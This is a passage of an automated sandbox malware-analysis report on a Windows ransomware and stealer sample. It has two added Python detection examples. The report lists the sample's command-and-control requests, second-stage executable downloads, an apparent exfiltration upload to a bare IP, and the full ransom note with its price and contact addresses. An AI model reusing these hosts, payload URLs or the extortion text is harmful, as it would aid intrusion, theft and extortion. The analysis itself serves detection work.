Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: U59WtZz2Sg.exe, 00000005.00000002.577980822.0000000002F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://we.tl/t-5UcwRdS3
Source: U59WtZz2Sg.exe, 00000005.00000002.577338464.0000000000908000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385599244.0000000000908000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.577980822.0000000002F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://we.tl/t-5UcwRdS3ED
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.gnu.org/licenses/lgpl.html.
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: U59WtZz2Sg.exe, 00000005.00000003.420123871.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: U59WtZz2Sg.exe, 00000005.00000003.444451772.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=02Google
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/zGoogle
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown DNS traffic detected: queries for: api.2ip.ua
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_0040CF10
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /asifrazatg HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 | Host: t.me
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: fresherlights.com
Source: global traffic HTTP traffic detected: GET /dl/build2.exe HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: uaery.top
Source: global traffic HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: fresherlights.com
Source: global traffic HTTP traffic detected: GET /517 HTTP/1.1 | Host: 88.198.94.71
Source: global traffic HTTP traffic detected: GET /176356074953.zip HTTP/1.1 | Host: 88.198.94.71 | Cache-Control: no-cache
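The requests above carry several traits a detection engineer would key on: a User-Agent that is the literal string "Microsoft Internet Explorer" (no real IE build sends that; genuine IE strings begin "Mozilla/4.0 (compatible; MSIE" or contain "Trident/"), a Firefox User-Agent with spaces around the slashes and no "Win64;" token, requests with no User-Agent at all, a Host header that is a bare IP address, a get.php?pid=<32 hex>&first=true key request, executables fetched over plain HTTP, and (further down in the report) a multipart POST to that same bare IP. The following is an added example, not code from the report or from the sample: the report's request entries are rebuilt as raw HTTP (constructed input, plus one made-up benign control) and run through a small classifier. The tag names are the example's own, and the family notes in the comments are general knowledge about STOP/Djvu and Vidar behaviour rather than something the report states.

```python
"""Flag the traits of the HTTP requests recorded in the report.

Added example, not code from the report or from the sample.  SAMPLE_REQUESTS
is constructed from the report's 'HTTP traffic detected' entries (one request
each, headers re-separated with CRLF) plus one made-up benign control; the
tag names and the family notes in comments are the example's own.
"""
import re
from dataclasses import dataclass

SAMPLE_REQUESTS = [
    # geolocation lookup before encryption starts (STOP/Djvu habit; general knowledge, not stated by the report)
    "GET /geo.json HTTP/1.1\r\nUser-Agent: Microsoft Internet Explorer\r\nHost: api.2ip.ua\r\n\r\n",
    # public Telegram profile read to resolve the stealer's C2 address (Vidar habit)
    "GET /asifrazatg HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0\r\nHost: t.me\r\n\r\n",
    # victim-ID registration / key request with the ransomware C2
    "GET /test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true HTTP/1.1\r\nUser-Agent: Microsoft Internet Explorer\r\nHost: fresherlights.com\r\n\r\n",
    # second-stage executables fetched over plain HTTP
    "GET /dl/build2.exe HTTP/1.1\r\nUser-Agent: Microsoft Internet Explorer\r\nHost: uaery.top\r\n\r\n",
    "GET /files/1/build3.exe HTTP/1.1\r\nUser-Agent: Microsoft Internet Explorer\r\nHost: fresherlights.com\r\n\r\n",
    # config fetch, DLL bundle download and multipart upload, all to a bare IP (the POST appears later in the report)
    "GET /517 HTTP/1.1\r\nHost: 88.198.94.71\r\n\r\n",
    "GET /176356074953.zip HTTP/1.1\r\nHost: 88.198.94.71\r\nCache-Control: no-cache\r\n\r\n",
    "POST / HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----1417805488924803\r\nHost: 88.198.94.71\r\nContent-Length: 131097\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    # constructed benign control: the shape of a genuine Firefox 107 request
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0\r\nAccept: text/html\r\n\r\n",
]


@dataclass
class Request:
    method: str
    path: str
    headers: dict          # header names lower-cased

    @property
    def host(self) -> str:
        return self.headers.get("host", "")


def parse_request(raw: str) -> Request:
    """Minimal HTTP/1.1 request-line + header parser (enough for captured traffic)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
# What Firefox on Windows actually sends: no spaces around '/', '; Win64; x64' or '; WOW64' optional.
GENUINE_FIREFOX_UA = re.compile(
    r"^Mozilla/5\.0 \(Windows NT [\d.]+(?:; (?:Win64; x64|WOW64))?; rv:\d+\.\d+\) "
    r"Gecko/20100101 Firefox/\d+\.\d+$")
KEY_REQUEST = re.compile(r"/get\.php\?pid=[0-9A-Fa-f]{32}&first=(?:true|false)$")


def classify(req: Request) -> list:
    """Return the tags that apply to one request (empty list = nothing suspicious found)."""
    tags = []
    ua = req.headers.get("user-agent")
    if ua is None:
        tags.append("no-user-agent")          # raw WinINet/socket code, not a browser
    elif ua == "Microsoft Internet Explorer":
        # No IE build sends this literal; real ones start "Mozilla/4.0 (compatible; MSIE" or contain "Trident/".
        tags.append("hardcoded-ie-ua")
    elif "Firefox" in ua and not GENUINE_FIREFOX_UA.match(ua):
        tags.append("malformed-firefox-ua")
    if BARE_IPV4.match(req.host):
        tags.append("bare-ip-host")           # matches the 'TCP traffic without DNS query' entries
    if req.host == "api.2ip.ua" and req.path == "/geo.json":
        tags.append("geo-check")
    if KEY_REQUEST.search(req.path):
        tags.append("key-request")
    if req.method == "GET" and req.path.lower().endswith(".exe"):
        tags.append("exe-download")
    if req.host == "t.me" and req.method == "GET" and "accept" not in req.headers:
        tags.append("telegram-dead-drop")     # a browser would send Accept/Accept-Language
    if (req.method == "POST" and BARE_IPV4.match(req.host)
            and req.headers.get("content-type", "").startswith("multipart/form-data")):
        tags.append("multipart-post-to-ip")   # likely exfiltration upload
    return tags


def scan(raw_requests) -> list:
    """[(host+path, tags), ...] for each captured request."""
    out = []
    for raw in raw_requests:
        req = parse_request(raw)
        out.append((req.host + req.path, classify(req)))
    return out


if __name__ == "__main__":
    for key, tags in scan(SAMPLE_REQUESTS):
        print(f"{key:75s} {', '.join(tags) or '-'}")
```

Each tag on its own is weak (plenty of legitimate tooling omits a User-Agent), which is why the classifier returns the full list per request rather than a verdict; the combination of a hard-coded User-Agent, a geolocation check, a key request and executable downloads from the same process is what makes the traffic distinctive.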
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 29 Nov 2022 23:22:31 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 
13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
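The "Data Raw" bytes of that 200 OK begin with 50 4b 03 04, the ZIP local-file-header signature, and the name field that follows the 30-byte header reads 66 72 65 65 62 6c 33 2e 64 6c 6c, i.e. freebl3.dll (the Mozilla NSS freebl library; stealers commonly pull the NSS and SQLite DLLs they need to read Firefox credential stores, which is general knowledge rather than a finding of this report). The following is an added example, not code from the report: it parses that header with Python's struct module from the first 41 bytes copied out of the report, so the archive's first entry can be identified from a truncated capture even though the central directory lives at the end of the file and is not available here.

```python
"""Identify the first entry of a ZIP from only its leading bytes.

Added example, not code from the report.  RESPONSE_BODY_PREFIX is the first
41 bytes of the 'Data Raw' field for the 200 OK to GET /176356074953.zip,
copied from the report; everything after the entry name is cut off.
"""
import struct
from dataclasses import dataclass
from datetime import datetime
from typing import Optional

RESPONSE_BODY_PREFIX = bytes.fromhex(
    "50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 "
    "50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c"
)

LOCAL_FILE_HEADER = struct.Struct("<IHHHHHIIIHH")  # 30 bytes, little-endian (APPNOTE 4.3.7)
LOCAL_FILE_HEADER_SIG = 0x04034B50                 # b"PK\x03\x04"
FLAG_UTF8_NAMES = 0x0800                           # general-purpose bit 11


@dataclass
class ZipEntry:
    name: str
    method: int              # 0 = stored, 8 = deflate
    flags: int
    crc32: int
    compressed_size: int
    uncompressed_size: int
    modified: datetime


def dos_datetime(mdate: int, mtime: int) -> datetime:
    """Decode the MS-DOS packed date/time stored in ZIP headers."""
    try:
        return datetime(1980 + (mdate >> 9), (mdate >> 5) & 0x0F, mdate & 0x1F,
                        mtime >> 11, (mtime >> 5) & 0x3F, (mtime & 0x1F) * 2)
    except ValueError:                      # garbage date fields are not unusual in malware archives
        return datetime(1980, 1, 1)


def parse_local_header(data: bytes) -> Optional[ZipEntry]:
    """Return the first local file header, or None if data is not a ZIP (or is cut too short)."""
    if len(data) < LOCAL_FILE_HEADER.size:
        return None
    (sig, _version, flags, method, mtime, mdate, crc32,
     csize, usize, name_len, _extra_len) = LOCAL_FILE_HEADER.unpack_from(data, 0)
    if sig != LOCAL_FILE_HEADER_SIG:
        return None
    name_bytes = data[LOCAL_FILE_HEADER.size:LOCAL_FILE_HEADER.size + name_len]
    if len(name_bytes) < name_len:
        return None                         # truncated inside the name field
    encoding = "utf-8" if flags & FLAG_UTF8_NAMES else "cp437"   # APPNOTE: CP437 unless bit 11 is set
    return ZipEntry(name_bytes.decode(encoding), method, flags, crc32, csize, usize,
                    dos_datetime(mdate, mtime))


def is_native_code_name(name: str) -> bool:
    """Crude extension check of the kind behind a 'downloads executable code' signature."""
    return name.lower().rsplit(".", 1)[-1] in {"exe", "dll", "sys", "scr"}


if __name__ == "__main__":
    entry = parse_local_header(RESPONSE_BODY_PREFIX)
    print(entry, "native code:", is_native_code_name(entry.name))
```

Only the local header is read, so compressed and uncompressed sizes come from the header itself; an archive that uses data descriptors (flag bit 3) would report zeros there and the real sizes would only be in the central directory, which is the usual reason a full-file parser is still needed once the whole response has been captured.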
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71 (identical entry repeated 50 times in the report)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.350334293.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: U59WtZz2Sg.exe, 00000005.00000003.350997403.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: U59WtZz2Sg.exe, 00000005.00000003.351612553.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/B equals www.youtube.com (Youtube)
Source: unknown HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----1417805488924803 | Host: 88.198.94.71 | Content-Length: 131097 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC, 1_2_004822E0
Source: U59WtZz2Sg.exe, 00000000.00000002.304665425.00000000007EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl

Spam, unwanted Advertisements and Ransom Demands

Source: C:\_readme.txt Dropped file:
ATTENTION!
Don't worry, you can return all your files!
All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
You can get and look video overview decrypt tool:
https://we.tl/t-5UcwRdS3ED
Price of private key and decrypt software is $980.
Discount 50% available if you contact us first 72 hours, that's price for you is $490.
Please note that you'll never restore your data without payment.
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
To get this software you need write on our e-mail:
support@fishmail.top
Reserve e-mail address to contact us:
datarestorehelp@airmail.cc
Your personal ID:
0609djfsieEK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS
Source: Yara match File source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE
